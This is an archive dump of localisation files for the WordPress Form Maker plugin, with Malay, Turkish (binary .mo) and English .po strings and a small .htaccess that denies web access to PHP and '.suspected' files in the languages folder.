#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Pilih Bidang yang "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Pilih Tarikh yang"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/.htaccess000044400000000424152434416630010316 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>languages/form_maker-tr_TR.mo000060400000007132152434416630012230 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
G
S
\
a
h
n
v
|
�
�
�
�
	�
�
�
�
�
.5:L_
fq��>����)F=&�	��#�L�%,
!R
0t
!�
A�
	)<4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:05+0400
PO-Revision-Date: 2015-05-22 17:05+0400
Last-Translator: 
Language-Team: 
Language: tr
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
NisanBölge koduAğustosSentŞehirÜlkeAralıkDolarHata, e-posta gönderilmedi.Hata, dosya taşınamaz.Hata, yanlış güvenlik kodu.ŞubatİlkGönderengitmek OcakTemmuzHaziranSonMartMayısOrtaHiçbir şey sunuldu.KasımEkimTelefon NumarasıPosta / Posta KoduMiktarsıfırla Bir Tarih SeçinizBir alan seçin EylülÜzgünüz, bu türde bir dosya yüklemek için izin verilmez.Eyalet / İl / BölgeSokak AdresiAdres Satırı 2TheDosyasının izin verilen boyutu aşıyorBu alan %s benzersiz bir giriş gerektirir ve bu değer zaten sunuldu.Bu geçerli bir e-posta adresi değil.Başlık:IçinDoğrulama bağlantısı geçersiz.Sen eski tarih seçemezsiniz. Geçerli olandan başlayarak bir tarih seçin.E-posta adresiniz zaten doğrulandı.E-posta başarıyla doğrulandı.E-posta doğrulaması zaman aşımına uğradı.Formunuz başarıyla gönderildi.Ip kara listeye alındı​​.Web sitesi yöneticisine başvurunPuanınız daha az olmalıdır Alan gerekmektedirdeğer arasında olmalıdır languages/form_maker-en_US.po000060400000056611152434416630012220 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:53+0400\n"
"PO-Revision-Date: 2015-05-22 16:53+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: el\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Street Address"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Street Address Line 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "City"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "State / Province / Region"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Postal / Zip Code"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Country"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "January"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "February"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "March"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "April"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "May"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "June"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "July"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "August"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "September"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "October"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "November"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "December"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Error, incorrect Security code."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Your ip is blacklisted. Please contact the website administrator."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "The file exceeds the allowed size of"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Sorry, you are not allowed to upload this type of file."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Error, file cannot be moved."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"This field %s requires a unique entry and this value was already submitted."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
msgid "Error, file destination does not exist."
msgstr "Error, file destination does not exist."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Nothing was submitted."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Your form was successfully submitted."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Error, email was not sent."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Your email address is already verified."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Your email has been successfully verified."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Your email verification has timed out."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Verification link is invalid."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "field is required."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "This is not a valid email address."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"You cannot select former dates. Choose a date starting from the current one."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "value must be between"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Quantity"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Your score should be less than"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Title"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "First"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Last"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Middle"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Area Code"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Phone Number"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dollars"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Cents"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "From"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "To"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "GO"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Reset"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

